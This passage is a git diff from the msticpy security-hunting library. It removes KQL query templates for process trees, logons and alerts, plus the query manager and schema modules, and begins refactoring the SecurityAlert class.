-let parentProcess = // Parent Process
-materialize(
-    {table}
-    {query_project}
-    | where {subscription_filter}
-    | where {host_filter_eq}
-    | where TimeGenerated >= start - time(1d)
-    | where TimeGenerated <= end
-    | where TimeGenerated <= sourceTimeCreatedUtc
-    | where (SubjectLogonId == sourceLogonId or TargetLogonId == sourceLogonId)
-    | where NewProcessId == sourceParentProcessId
-    | extend NodeRole = 'parent', Level = 1
-    | top 1 by TimeCreatedUtc desc nulls last);
-let parentLogonId = toscalar(sourceProcess | project SubjectLogonId);
-let parentTimeCreated = toscalar(sourceProcess | project TimeCreatedUtc);
-let childProcesses = // Child Process
-materialize(
-    {table}
-    {query_project}
-    | where {subscription_filter}
-    | where {host_filter_eq}
-    | where TimeGenerated >= start
-    | where TimeGenerated <= end
-    | where SubjectLogonId == sourceLogonId
-    | where ProcessId == sourceProcessId
-    | extend NodeRole = 'child', Level = 1);
-
-sourceProcess
-| union (parentProcess)
-| union (childProcesses)
-| union
-(
-    // GrandParent Process (we ignore this if this is the system logonId)
-    {table}
-    {query_project}
-    | where {subscription_filter}
-    | where {host_filter_eq}
-    | where TimeGenerated >= start - time(1d)
-    | where TimeGenerated <= end
-    | where TimeGenerated <= parentTimeCreated
-    | where (SubjectLogonId == parentLogonId or TargetLogonId == parentLogonId)
-    | extend NodeRole = 'parent', Level = 2
-    | join (parentProcess | project ProcessId) on $left.NewProcessId == $right.ProcessId
-)
-| union
-(
-    // GrandChild Process (we ignore this if this is the system logonId)
-    {table}
-    {query_project}
-    | where {subscription_filter}
-    | where {host_filter_eq}
-    | where TimeGenerated >= start
-    | where TimeGenerated <= end
-    | where SubjectLogonId == sourceLogonId and SubjectLogonId != system_session_id
-    | extend NodeRole = 'child', Level = 2
-    | join (childProcesses | project NewProcessId) on $left.ProcessId == $right.NewProcessId
-)
-| union
-(
-    // Sibling Process
-    {table}
-    {query_project}
-    | where {subscription_filter}
-    | where {host_filter_eq}
-    | where TimeGenerated >= start
-    | where TimeGenerated <= end
-    | where SubjectLogonId == sourceLogonId
-    | where ProcessId == sourceParentProcessId
-    | where NewProcessId != sourceProcessId
-    | extend NodeRole = 'sibling', Level = 1
-)
-{add_query_items}
-''',
-                    description='Retrieves process tree for a process.',
-                    data_source='process_create',
-                    data_families=[DataFamily.WindowsSecurity,
-                                   DataFamily.LinuxSecurity],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='list_processes',
-                    query='''
-let start = datetime({start});
-let end = datetime({end});
-{table}
-{query_project}
-| where {subscription_filter}
-| where {host_filter_eq}
-| where TimeGenerated >= start
-| where TimeGenerated <= end
-{add_query_items}
-''',
-                    description='Retrieves processes for a host.',
-                    data_source='process_create',
-                    data_families=[DataFamily.WindowsSecurity,
-                                   DataFamily.LinuxSecurity],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='get_process_parent',
-                    query='''
-let start = datetime({start});
-let end = datetime({end});
-let sourceProcessId = \'{process_id}\';
-let sourceLogonId = \'{logon_session_id}\';
-let sourceProcess =
-materialize(
-    {table}
-    {query_project}
-    | where {subscription_filter}
-    | where {host_filter_eq}
-    | where TimeGenerated >= start
-    | where TimeGenerated <= end
-    | where SubjectLogonId == sourceLogonId
-    | where NewProcessId == sourceProcessId
-    | where NewProcessName =~ \'{process_name}\'
-    | extend NodeRole = 'source', Level = 0
-    | top 1 by TimeCreatedUtc desc nulls last);
-let sourceTimeCreatedUtc = toscalar(sourceProcess | project TimeCreatedUtc );
-let sourceParentProcessId = toscalar(sourceProcess | project ProcessId);
-// Parent Process
-{table}
-{query_project}
-| where {subscription_filter}
-| where {host_filter_eq}
-| where TimeGenerated >= start - time(2h)
-| where TimeGenerated <= end
-| where TimeGenerated <= sourceTimeCreatedUtc
-| where (SubjectLogonId == sourceLogonId or TargetLogonId == sourceLogonId)
-| where NewProcessId == sourceParentProcessId
-| where NewProcessId == sourceParentProcessId
-| extend NodeRole = 'parent', Level = 1
-| top 1 by TimeCreatedUtc desc nulls last);
-{add_query_items}
-''',
-                    description='Retrieves the parent process of a process process',
-                    data_source='process_create',
-                    data_families=[DataFamily.WindowsSecurity,
-                                   DataFamily.LinuxSecurity],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='list_hosts_matching_commandline',
-                    query='''
-{table}
-{query_project}
-| where {subscription_filter}
-| where {host_filter_neq}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-| where NewProcessName endswith \'{process_name}\'
-| where CommandLine =~ \'{commandline}\'
-{add_query_items}
-''',
-                    description='Retrieves processes on other hosts with matching commandline',
-                    data_source='process_create',
-                    data_families=[DataFamily.WindowsSecurity,
-                                   DataFamily.LinuxSecurity],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='list_processes_in_session',
-                    query='''
-{table}
-{query_project}
-| where {subscription_filter}
-| where {host_filter_eq}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-| where SubjectLogonId == \'{logon_session_id}\'
-| extend processName = tostring(split(NewProcessName, \'{path_separator}\')[-1])
-| extend commandlineparts = arraylength(split(CommandLine, ' '))
-| extend commandlinelen = strlen(CommandLine)
-{add_query_items}
-''',
-                    description='Retrieves all processes on the host for a logon session',
-                    data_source='process_create',
-                    data_families=[DataFamily.WindowsSecurity,
-                                   DataFamily.LinuxSecurity],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='get_host_logon',
-                    query='''
-{table}
-{query_project}
-| where {subscription_filter}
-| where {host_filter_eq}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-| where TargetLogonId == \'{logon_session_id}\'
-{add_query_items}
-''',
-                    description='Retrieves the logon event for the session id on the host.',
-                    data_source='account_logon',
-                    data_families=[DataFamily.WindowsSecurity,
-                                   DataFamily.LinuxSecurity],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='list_host_logons',
-                    query='''
-{table}
-{query_project}
-| where {subscription_filter}
-| where {host_filter_eq}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-{add_query_items}
-''',
-                    description='Retrieves the logon events on the host.',
-                    data_source='account_logon',
-                    data_families=[DataFamily.WindowsSecurity,
-                                   DataFamily.LinuxSecurity],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
-
-_add_query(KqlQuery(name='list_host_logon_failures',
-                    query='''
-{table}
-{query_project}
-| where {subscription_filter}
-| where {host_filter_eq}
-| where TimeGenerated >= datetime({start})
-| where TimeGenerated <= datetime({end})
-{add_query_items}
-''',
-                    description='Retrieves the logon failure events on the host.',
-                    data_source='account_logon_fail',
-                    data_families=[DataFamily.WindowsSecurity,
-                                   DataFamily.LinuxSecurity],
-                    data_environments=[DataEnvironment.LogAnalytics],
-                    optional_params=['add_query_items']))
diff --git a/msticpy/nbtools/query_defns.py b/msticpy/nbtools/query_defns.py
deleted file mode 100644
index 11f7ce21b..000000000
--- a/msticpy/nbtools/query_defns.py
+++ /dev/null
@@ -1,120 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""Query helper definitions."""
-from abc import ABC, abstractmethod
-from enum import Enum
-
-from attr import attrs, attrib, Factory
-
-from . utility import export
-
-__all__ = ['KqlQuery']
-
-
-# Query definition
-@attrs
-class KqlQuery(object):
-    """KqlQuery definition."""
-
-    name = attrib(default=None)
-    query = attrib(default=None)
-    description = attrib(default=None)
-    data_source = attrib(default=None)
-    data_families = attrib(default=Factory(list))
-    data_environments = attrib(default=Factory(list))
-    optional_params = attrib(default=Factory(list))
-
-
-@export
-class DataFamily(Enum):
-    """
-    Enumeration of data families.
-
-    Used to identify which queries are relevant for which
-    data sources.
-    """
-
-    WindowsSecurity = 1
-    LinuxSecurity = 2
-    SecurityAlert = 3
-
-    @classmethod
-    def parse(cls, value):
-        """
-        Conver string or int to enum.
-
-            :param value: value to parse
-        """
-        if isinstance(value, cls):
-            return value
-
-        parsed_enum = None
-        if isinstance(value, str):
-            try:
-                parsed_enum = cls[value]
-            except KeyError:
-                pass
-        if isinstance(value, int):
-            parsed_enum = cls(value)
-        return parsed_enum
-
-
-@export
-class DataEnvironment(Enum):
-    """
-    Enumeration of data environments.
-
-    Used to identify which queries are relevant for which
-    data sources.
-    """
-
-    LogAnalytics = 1
-    Kusto = 2
-
-    @classmethod
-    def parse(cls, value):
-        """
-        Conver string or int to enum.
-
-            :param value: value to parse
-        """
-        if isinstance(value, cls):
-            return value
-
-        parsed_enum = None
-        if isinstance(value, str):
-            try:
-                parsed_enum = cls[value]
-            except KeyError:
-                pass
-        if isinstance(value, int):
-            parsed_enum = cls(value)
-        return parsed_enum
-
-
-@export
-class QueryParamProvider(ABC):
-    """
-    Abstract type for QueryParamProvider.
-
-    Method query_params must be overridden by derived classes.
-
-    """
-
-    @property
-    @abstractmethod
-    def query_params(self):
-        """
-        Return dict of query parameters.
-
-        These parameters are sourced in the object
-        implementing this method.
-
-        Returns:
-            dict -- dictionary of query parameter values.
-
-        """
-        return {}
diff --git a/msticpy/nbtools/query_mgr.py b/msticpy/nbtools/query_mgr.py
deleted file mode 100644
index b4e20a078..000000000
--- a/msticpy/nbtools/query_mgr.py
+++ /dev/null
@@ -1,340 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""query manager helper functions for use with IPython/Juptyer queries."""
-import sys
-from functools import partial
-import re
-
-from . query_schema import DataSchema
-from . query_builtin_queries import query_definitions
-from . query_defns import KqlQuery, QueryParamProvider, DataFamily, DataEnvironment
-from . utility import export
-from .. _version import VERSION
-
-__version__ = VERSION
-__author__ = 'Ian Hellen'
-
-# module constants
-_DATA_FAMILY_NAME = 'data_family'
-_DATA_ENVIRONMENT_NAME = 'data_environment'
-
-
-# utility functions
-@export
-def print_kql(query_string: str):
-    """Print kql query stripped of comments and newline characters."""
-    clean_qry = re.sub(r'(//[^\"\'\n]+)', ' ', query_string, re.MULTILINE).strip()
-    for line in clean_qry.split('\n'):
-        print(line.strip())
-
-
-@export
-def clean_kql_query(query_string: str) -> str:
-    """Return kql query stripped of comments and newline characters."""
-    remove_comments = re.sub(r'(//[^\"\'\n]+)', ' ', query_string, re.MULTILINE).strip()
-    # get rid of newlines and returns
-    return re.sub(r'(\s*\n\s*)', ' ', remove_comments)
-
-
-@export
-def query_help(queryname: str):
-    """Print query usage."""
-    if queryname not in query_definitions:
-        print('Unknown query: ', queryname)
-        return
-
-    kql_query = query_definitions[queryname]
-    print('Query: ', queryname)
-    print(query_definitions[queryname].description)
-    print('Designed to be executed with data_source: ',
-          kql_query.data_source)
-    print('Supported data families: ',
-          ', '.join([str(fam) for fam in kql_query.data_families]))
-    print('Supported data environments: ',
-          ', '.join([str(env) for env in kql_query.data_environments]))
-
-    req_params = required_params(kql_query.query)
-    req_params.remove('table')
-    req_params.remove('query_project')
-
-    print('Query parameters:')
-    print(req_params)
-    if kql_query.optional_params:
-        print('Optional parameters:')
-        print(', '.join([str(param) for param in kql_query.optional_params]))
-    print('Query:')
-    print_kql(kql_query.query)
-
-
-@export
-def add_query(kql_query: KqlQuery = None, **kwargs):
-    """
-    Add a query to the current set.
-
-        :param kql_query:KqlQuery:
-    """
-    if kql_query is None:
-        def_data_families = [DataEnvironment.LogAnalytics]
-        def_data_environments = [
-            DataFamily.WindowsSecurity, DataFamily.LinuxSecurity]
-        if 'name' not in kwargs or 'query' not in kwargs or 'data_source' not in kwargs:
-            raise ValueError(
-                'If kql_query is not supplied the kwargs must include name, query and data_source.')
-        kql_query = KqlQuery(name=kwargs['name'],
-                             query=kwargs['query'],
-                             description=kwargs.get('description', None),
-                             data_source=kwargs['data_source'],
-                             data_families=kwargs.get(
-                                 'data_families', def_data_families),
-                             data_environments=kwargs.get('data_environments',
-                                                          def_data_environments))
-    query_definitions[kql_query.name] = kql_query
-    _add_queries_to_module(__name__)
-
-    kql_modules = [m for m in sys.modules if m.endswith('msticpy.nbtools.kql')]
-    if len(kql_modules) == 1:
-        _add_queries_to_module(kql_modules[0])
-
-
-@export
-def list_queries():
-    """Return list of currently defined queries."""
-    return list(query_definitions.keys())
-
-
-@export
-def replace_query_params(query_name: str, *args, **kwargs) -> str:
-    """
-    Return the parameterized query for query_name.
-
-    Arguments:
-        query_name {string}: The query to use
-        args {QueryParamProvider}: objects that
-                implement QueryParamProvider (from which query
-                parameters can be extracted).
-        kwargs:
-            {string:[QueryParamProvider]} - for the key 'provs'
-                this should be a collection of objects that
-                implement QueryParamProvider (from which query
-                parameters can be extracted).
-                OR
-            {string:value pairs} -- custom parameter list
-                (override default values and values extracted
-                from QueryParamProviders).
-    Raises:
-        LookupError -- query_name cannot be found
-
-    Returns:
-        string -- substituted query
-
-    """
-    return replace_prov_query_params(query_name=query_name,
-                                     provs=args,
-                                     **kwargs)
-
-
-@export
-def replace_prov_query_params(query_name: str, **kwargs) -> str:
-    """
-    Return the parameterized query for query_name.
-
-    Arguments:
-        query_name {string} -- The query to use
-        kwargs
-            {string:[QueryParamProvider]} - for the key 'provs'
-                this should be a collection of objects that
-                implement QueryParamProvider (from which query
-                parameters can be extracted).
-                OR
-            {string:value pairs} -- custom parameter list
-                (override default values and values extracted
-                from QueryParamProviders).
-    Raises:
-        LookupError -- query_name cannot be found.
-        ValueError -- query parameter value could not be found.
-
-    Returns:
-        string -- substituted query
-
-    """
-    if query_name not in query_definitions:
-        raise LookupError(f'Unknown query "{query_name}"')
-
-    kql_query = query_definitions[query_name]
-    if 'provs' in kwargs:
-        p_args = kwargs.pop('provs')
-        query_params = _get_query_params(kql_query, *p_args, **kwargs)
-    else:
-        query_params = _get_query_params(kql_query, **kwargs)
-    return kql_query.query.format(**query_params)
-
-
-def _get_query_params(kql_query, *args, **kwargs):
-    """
-    Get the parameters needed for the query.
-
-    Arguments:
-        kql_query {KqlQuery} -- query object
-        args {list} -- set of source objects to extract parameter
-            values from
-        kwargs {string:value pairs} -- custom parameter list
-            (overrides auto-extracted values)
-
-    Raises:
-        LookupError -- Could not find valid data_family or
-            data_environment
-        ValueError -- Values for one or more required parameters
-            could not be found
-
-    Returns:
-        dict -- Dictionary of parameter names and values to be used
-            in the query
-
-    """
-    # get the required parameters for this query and build a dictionary
-    req_param_names = required_params(kql_query.query)
-    req_params = {param: None for param in req_param_names}
-
-    # Iterate through required parameters. If any are set in the supplied
-    # provider objects, assign them to our output dictionary
-    query_providers = [prov for prov in args if isinstance(prov, QueryParamProvider)]
-    for provider in query_providers:
-        for param in req_param_names:
-            if param in provider.query_params:
-                req_params[param] = provider.query_params[param]
-
-    # If any custom parameters have been supplied add these
-    # overriding any parameters from the QueryParamProviders
-    if kwargs:
-        req_params.update(kwargs)
-
-    data_family, data_environment = _get_data_family_and_env(kql_query, query_providers, kwargs)
-
-    if not data_family:
-        supp_families = ', '.join(DataSchema.get_data_families())
-        raise LookupError('Could not find a valid data_family value. '
-                          f'Valid families are: {supp_families}')
-    if not data_environment:
-        supp_envs = ', '.join(DataSchema.get_data_environments())
-        raise LookupError('Could not find a valid data_environment value. '
-                          f'Valid environments are: {supp_envs}')
-
-    # Create the data schema and get any unset parameters from
-    # the data schema
-    data_schema = DataSchema(environment=data_environment,
-                             data_family=data_family,
-                             data_source=kql_query.data_source)
-
-    for param, value in req_params.items():
-        if not value and param in data_schema:
-            req_params[param] = data_schema[param]
-
-    # If we have missing parameters try to retrieve them
-    # as attributes of the object
-    missing_params = [p_name for p_name, p_value in req_params.items() if not p_value]
-    if missing_params:
-        for other_object in [obj for obj in args if not isinstance(obj, QueryParamProvider)]:
-            for m_param in missing_params:
-                if m_param in other_object:
-                    req_params[m_param] = getattr(other_object, m_param)
-            missing_params = [p_name for p_name, p_value in req_params.items() if not p_value]
-
-        if missing_params:
-            # check for and remove optional parameters from the missing params list
-            for m_param in missing_params:
-                if m_param in kql_query.optional_params:
-                    req_params[m_param] = ''
-            missing_params = [p_name for p_name in missing_params
-                              if p_name not in kql_query.optional_params]
-
-        if missing_params:
-            # If still have missing params then we error out
-            query_help(kql_query.name)
-            mssg = ('The following required parameters for this query were not set:',
-                    ', '.join(missing_params))
-            raise ValueError(mssg)
-
-    return req_params
-
-
-def _get_data_family_and_env(kql_query, providers, custom_params):
-    """Get the data_family and environment."""
-    data_family = None
-    data_environment = None
-
-    # If there is only one data family for this query, then use that
-    if len(kql_query.data_families) == 1:
-        data_family = kql_query.data_families[0]
-    if len(kql_query.data_environments) == 1:
-        data_environment = kql_query.data_environments[0]
-
-    if data_family and data_environment:
-        return data_family, data_environment
-
-    candidate_families = set()
-    candidate_environments = set()
-    for provider in providers:
-        if _DATA_FAMILY_NAME in provider.query_params:
-            fam_value = DataFamily.parse(provider.query_params[_DATA_FAMILY_NAME])
-            if fam_value:
-                candidate_families.add(fam_value)
-        if _DATA_ENVIRONMENT_NAME in provider.query_params:
-            env_value = DataEnvironment.parse(provider.query_params[_DATA_ENVIRONMENT_NAME])
-            if env_value:
-                candidate_environments.add(env_value)
-
-    if custom_params:
-        # If we haven't yet worked out the data family and environment
-        # try to get this from one of custom_params
-        if _DATA_FAMILY_NAME in custom_params:
-            fam_value = DataFamily.parse(custom_params[_DATA_FAMILY_NAME])
-            if fam_value:
-                candidate_families.add(fam_value)
-        if _DATA_ENVIRONMENT_NAME in custom_params:
-            env_value = DataEnvironment.parse(custom_params[_DATA_ENVIRONMENT_NAME])
-            if env_value:
-                candidate_environments.add(env_value)
-
-    # get the intersection of families and environments that we found and those
-    # supported by the query. If it is 1 item we are good to go.
-    usable_families = candidate_families & set(kql_query.data_families)
-    if len(usable_families) == 1:
-        data_family = usable_families.pop()
-    usable_environments = candidate_environments & set(kql_query.data_environments)
-    if len(usable_environments) == 1:
-        data_environment = usable_environments.pop()
-
-    return data_family, data_environment
-
-
-@export
-def required_params(kql_query: any) -> list:
-    """
-    Return the set of required parameters for the query.
-
-        :param query_string:
-    """
-    if isinstance(kql_query, KqlQuery):
-        query_string = kql_query.query
-    else:
-        query_string = kql_query
-    param_pattern = r'{([\w\d_-]+)}'
-    return list(set(re.findall(param_pattern, query_string)))
-
-
-def _add_queries_to_module(module_name):
-    """Add queries to the module as callable methods."""
-    if module_name not in sys.modules:
-        raise LookupError(f'Module {module_name} was not found sys.modules')
-    for query_name in query_definitions:
-        module = sys.modules[module_name]
-        query_func = partial(replace_prov_query_params, query_name=query_name)
-        query_func.__doc__ = replace_prov_query_params.__doc__
-        setattr(module, query_name, query_func)
-
-
-# Add all queries defined in builtin queries module as functions
-_add_queries_to_module(__name__)
diff --git a/msticpy/nbtools/query_schema.py b/msticpy/nbtools/query_schema.py
deleted file mode 100644
index 5382d92f5..000000000
--- a/msticpy/nbtools/query_schema.py
+++ /dev/null
@@ -1,306 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""
-eventschema.
-
-Module for DataSchema class
-"""
-from . query_defns import DataFamily, DataEnvironment
-from . utility import export
-from .. _version import VERSION
-
-__version__ = VERSION
-__author__ = 'Ian Hellen'
-
-
-# TODO Refactor to simpler data structure
-@export
-class DataSchema:
-    """DataSchema class for Log Analytics Queries."""
-
-    DATA_MAPPINGS = {DataEnvironment.LogAnalytics: {},
-                     DataEnvironment.Kusto: {}}
-    DATA_MAPPINGS[DataEnvironment.LogAnalytics] = {DataFamily.WindowsSecurity: {},
-                                                   DataFamily.LinuxSecurity: {},
-                                                   DataFamily.SecurityAlert: {}}
-
-    _SECURITY_ALERT = {'table': 'SecurityAlert',
-                       'query_project': '''| project
-                                            TenantId,
-                                            StartTimeUtc = StartTime,
-                                            EndTimeUtc = EndTime,
-                                            ProviderAlertId = VendorOriginalId,
-                                            SystemAlertId,
-                                            ProviderName,
-                                            VendorName,
-                                            AlertType = AlertName,
-                                            AlertName,
-                                            AlertDisplayName = DisplayName,
-                                            Description,
-                                            Severity = AlertSeverity,
-                                            IsIncident,
-                                            ExtendedProperties,
-                                            Entities,
-                                            ConfidenceLevel,
-                                            ConfidenceScore,
-                                            ExtendedLinks,
-                                            WorkspaceSubscriptionId,
-                                            WorkspaceResourceGroup,
-                                            TimeGenerated,
-                                            ResourceId,
-                                            SourceComputerId '''}
-
-    _PROC_CREATE_WIN = {'table': 'SecurityEvent | where EventID == 4688',
-                        'query_project': '''| project
-                                            TenantId,
-                                            Account,
-                                            EventID,
-                                            TimeGenerated,
-                                            Computer,
-                                            SubjectUserSid,
-                                            SubjectUserName,
-                                            SubjectDomainName,
-                                            SubjectLogonId,
-                                            NewProcessId,
-                                            NewProcessName,
-                                            TokenElevationType,
-                                            ProcessId,
-                                            CommandLine,
-                                            ParentProcessName,
-                                            TargetLogonId,
-                                            SourceComputerId
-                                            | extend TimeCreatedUtc=TimeGenerated '''}
-
-    _ACCOUNT_LOGON_WIN = {'table': 'SecurityEvent | where EventID == 4624',
-                          'query_project': '''| project
-                                            TenantId,
-                                            Account,
-                                            EventID,
-                                            TimeGenerated,
-                                            SourceComputerId,
-                                            Computer,
-                                            SubjectUserName,
-                                            SubjectDomainName,
-                                            SubjectUserSid,
-                                            TargetUserName,
-                                            TargetDomainName,
-                                            TargetUserSid,
-                                            TargetLogonId,
-                                            LogonProcessName,
-                                            LogonType,
-                                            AuthenticationPackageName,
-                                            Status,
-                                            IpAddress,
-                                            WorkstationName'''}
-
-    _ACCOUNT_LOGON_FAIL_WIN = {'table': 'SecurityEvent | where EventID == 4625',
-                               'query_project': '''| project
-                                            TenantId,
-                                            Account,
-                                            EventID,
-                                            TimeGenerated,
-                                            SourceComputerId,
-                                            Computer,
-                                            SubjectUserName,
-                                            SubjectDomainName,
-                                            SubjectUserSid,
-                                            TargetUserName,
-                                            TargetDomainName,
-                                            TargetUserSid,
-                                            TargetLogonId,
-                                            LogonProcessName,
-                                            LogonType,
-                                            AuthenticationPackageName,
-                                            Status,
-                                            IpAddress,
-                                            WorkstationName'''}
-
-    _PROC_CREATE_LX = {'table': 'LinuxAuditD | where EventID == 14688',
-                       'query_project': '''| project
-                                            TenantId,
-                                            Account,
-                                            EventID,
-                                            TimeGenerated,
-                                            SourceComputerId
-                                            Computer=node,
-                                            SubjectUserSid=uid,
-                                            SubjectUserName=user,
-                                            SubjectDomainName,
-                                            SubjectLogonId=ses,
-                                            NewProcessId=pid,
-                                            NewProcessName=exe,
-                                            TokenElevationType,
-                                            ProcessId=ppid,
-                                            CommandLine=cmdline,
-                                            ParentProcessName,
-                                            TargetLogonId,
-                                            success,
-                                            audit_user,
-                                            auid,
-                                            group,
-                                            gid,
-                                            effective_user,
-                                            euid,
-                                            effective_group,
-                                            egid,
-                                            cwd,
-                                            name
-                                            | extend TimeCreatedUtc=TimeGenerated '''}
-    _ACCOUNT_LOGON_LX = {'table': 'LinuxAuditD | where EventID == 1100 or EventID == 1112',
-                         'query_project': '''| project
-                                            TenantId,
-                                            Account,
-                                            EventID,
-                                            TimeGenerated,
-                                            SourceComputerId
-                                            Computer=node,
-                                            SubjectUserName=acct,
-                                            SubjectDomainName='',
-                                            SubjectUserSid=auid,
-                                            TargetUserName=user,
-                                            TargetDomainName='',
-                                            TargetUserSid=uid,
-                                            TargetLogonId=ses,
-                                            LogonProcessName=exe,
-                                            LogonType=0,
-                                            AuthenticationPackageName,
-                                            Status=res,
-                                            audit_user,
-                                            IpAddress=addr,
-                                            WorkstationName=hostname'''}
-    # Add to the main dictionaries
-    DATA_MAPPINGS[DataEnvironment.LogAnalytics][DataFamily.SecurityAlert] = {
-        'security_alert': _SECURITY_ALERT}
-    DATA_MAPPINGS[DataEnvironment.LogAnalytics][DataFamily.WindowsSecurity] = {
-        'process_create': _PROC_CREATE_WIN, 'account_logon': _ACCOUNT_LOGON_WIN,
-        'account_logon_fail': _ACCOUNT_LOGON_FAIL_WIN}
-    DATA_MAPPINGS[DataEnvironment.LogAnalytics][DataFamily.LinuxSecurity] = {
-        'process_create': _PROC_CREATE_LX, 'account_logon': _ACCOUNT_LOGON_LX}
-
-    def __init__(self, environment: DataEnvironment = DataEnvironment.LogAnalytics,
-                 data_family: DataFamily = DataFamily.WindowsSecurity,
-                 data_source: str = 'security_alert'):
-        """
-        Create a new instance of the DataSchema object.
-
-            :param environment='LogAnalytics': Specify the environment for the schema.
-            :param data_family=DataFamily.WindowsSecurity: Specify the data family
-                for the schema (e.g. DataFamily.SecurityAlert)
-            :param data_source='security_alert': Specify the data source required.
-        """
-        if isinstance(environment, str):
-            try:
-                environment = DataEnvironment[environment]
-            except KeyError:
-                pass
-        if environment not in DataSchema.DATA_MAPPINGS:
-            raise LookupError(f'Unknown environment {environment}. '
-                              'Valid environments are:\n{self.environments}')
-
-        if isinstance(data_family, str):
-            try:
-                data_family = DataFamily[data_family]
-            except KeyError:
-                pass
-        if data_family not in DataSchema.DATA_MAPPINGS[environment]:
-            raise LookupError(f'Unknown data_family {data_family}. '
-                              'Valid families are:\n{self.data_families}')
-
-        if data_source not in DataSchema.DATA_MAPPINGS[environment][data_family]:
-            raise LookupError(f'Unknown data_source {data_family}. '
-                              'Valid data sources are:\n{self.data_source_types}')
-
-        self.current = DataSchema.DATA_MAPPINGS[environment][data_family][data_source]
-
-    def __getitem__(self, key):
-        """Index operator overload."""
-        if self.current is not None and key is not None and key in self.current:
-            return self.current[key]
-        raise KeyError('{} has no attribute {}'.format(str(type(self)), key))
-
-    def __contains__(self, key):
-        """In operator overload."""
-        if self.current is not None and key is not None and key in self.current:
-            return True
-        return False
-
-    @property
-    def data_environments(self):
-        """Return the environments defined in the schema."""
-        return self.get_data_environments()
-
-    @property
-    def data_families(self):
-        """Return the data families in the schema."""
-        return self.get_data_families()
-
-    @property
-    def data_source_types(self):
-        """Return the data families in the schema."""
-        sources = set()
-        for _, data in self.DATA_MAPPINGS.items():
-            for _, data_source in data.items():
-                for source in data_source:
-                    sources.add(source)
-
-        return sources
-
-    @property
-    def property_names(self):
-        """Return the current items available in the schema."""
-        return list(self.current.keys())
-
-    @classmethod
-    def default_schemas(cls, environment=None, data_family=None):
-        """
-        Return data sources for specified environment and data family.
-
-            :param environment: the data environment
-            :param data_family: the data family (e.g. WindowsSecurity,
-                LinuxSecurity, Office365)
-        """
-        if environment is None or environment not in DataSchema.DATA_MAPPINGS:
-            raise LookupError('Invalid value for environment. Expected one of {}'
-                              .format(', '.join(cls.get_data_environments())))
-
-        env = DataSchema.DATA_MAPPINGS[environment]
-        if data_family is None or data_family not in env:
-            raise LookupError('Invalid value for data_family. Expected one of {}'
-                              .format(', '.join(cls.get_data_families())))
-
-        return env[data_family]
-
-    @classmethod
-    def get_data_environments(cls):
-        """Return the environments defined in the schema."""
-        return list({DataEnvironment(env_name).name for env_name in cls.DATA_MAPPINGS})
-
-    @classmethod
-    def get_data_families(cls):
-        """Return the data families in the schema."""
-        families = set()
-        for _, data in cls.DATA_MAPPINGS.items():
-            for data_map in data:
-                families.add(DataFamily(data_map).name)
-
-        return list(families)
-
-
-if __name__ == '__main__':
-    # mini test code
-    # pylint: disable=locally-disabled, C0103
-    schema = DataSchema(environment='LogAnalytics',
-                        data_family='WindowsSecurity', data_source='process_create')
-    assert len(schema.data_environments) >= 2
-    assert len(schema.data_families) >= 2
-    assert len(schema.data_source_types) >= 3
-    assert 'table' in schema
-    assert 'query_project' in schema
-    schemas = DataSchema.default_schemas(
-        environment='LogAnalytics', data_family='WindowsSecurity')
-    assert schemas is not None
-    assert len(schemas) >= 3
-    # pylint: enable=locally-disabled, C0103
diff --git a/msticpy/nbtools/security_alert.py b/msticpy/nbtools/security_alert.py
index ac36d0993..d59cc0fb1 100644
--- a/msticpy/nbtools/security_alert.py
+++ b/msticpy/nbtools/security_alert.py
@@ -6,18 +6,21 @@
 """Module for SecurityAlert class."""
 import json
 from json import JSONDecodeError
+from typing import Dict, Any, List
 
 import pandas as pd
+from deprecated.sphinx import deprecated
 
 from .._version import VERSION
-from .entityschema import Entity, UnknownEntity
+from ..datamodel.entities import Entity, UnknownEntity
 from .security_base import SecurityBase
-from .utility import export
+from ..common.utility import export
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
+__author__ = "Ian Hellen"
 
 
+@deprecated(reason="Replaced by Alert entity in datamodel", version="1.7.0")
 @export
 class SecurityAlert(SecurityBase):
     """
@@ -32,52 +35,68 @@ def __init__(self, src_row: pd.Series = None):
         super().__init__(src_row=src_row)
 
         # add entities to dictionary to remove dups
-        self._src_entities = dict()
-        if 'Entities' in src_row:
-            self._extract_entities(src_row)
-
-        if 'ExtendedProperties' in src_row:
-            if isinstance(src_row.ExtendedProperties, dict):
-                self.extended_properties = src_row.ExtendedProperties
-            elif isinstance(src_row.ExtendedProperties, str):
-                try:
-                    self.extended_properties = json.loads(src_row.ExtendedProperties)
-                except JSONDecodeError:
-                    pass
-        else:
-            self.extended_properties = []
+        self._src_entities: Dict[int, Entity] = {}
+
+        self.extended_properties: Dict[str, Any] = {}
+        if src_row is not None:
+            if "Entities" in src_row:
+                self._extract_entities(src_row)
+
+            if "ExtendedProperties" in src_row:
+                if isinstance(src_row.ExtendedProperties, dict):
+                    self.extended_properties = src_row.ExtendedProperties
